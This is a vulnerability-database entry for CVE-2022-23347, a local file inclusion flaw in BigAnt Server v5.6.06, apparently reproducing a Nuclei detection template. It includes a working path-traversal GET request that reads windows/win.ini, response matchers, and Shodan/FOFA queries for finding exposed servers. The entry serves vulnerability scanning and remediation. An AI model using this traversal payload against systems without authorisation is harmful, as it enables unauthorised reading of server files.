Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-23347
HistoryApr 16, 2022 - 9:03 a.m.

BigAnt Server v5.6.06 - Local File Inclusion

2022-04-1609:03:35
ProjectDiscovery
github.com
3
bigant
server
local file inclusion
vulnerability
bigantsoft

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.102

Percentile

95.1%

BigAnt Server v5.6.06 is vulnerable to local file inclusion.

id: CVE-2022-23347

info:
  name: BigAnt Server v5.6.06 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: BigAnt Server v5.6.06 is vulnerable to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in BigAnt Server v5.6.06.
  reference:
    - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23347
    - http://bigant.com
    - https://www.bigantsoft.com/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-23347
    cwe-id: CWE-22
    epss-score: 0.11382
    epss-percentile: 0.95203
    cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bigantsoft
    product: bigant_server
    shodan-query:
      - http.html:"BigAnt"
      - http.html:"bigant"
    fofa-query: body="bigant"
  tags: cve,cve2022,bigant,lfi,bigantsoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b43aeb9c6555299a14b9ecf0389b61f16cbb2fa88477e41dce1c97a48dbbb993022100f7c5f17d61c27c37d23fffbe66849000391a654c0fd72ccdd51525cc88ac476b:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.102

Percentile

95.1%

Related for NUCLEI:CVE-2022-23347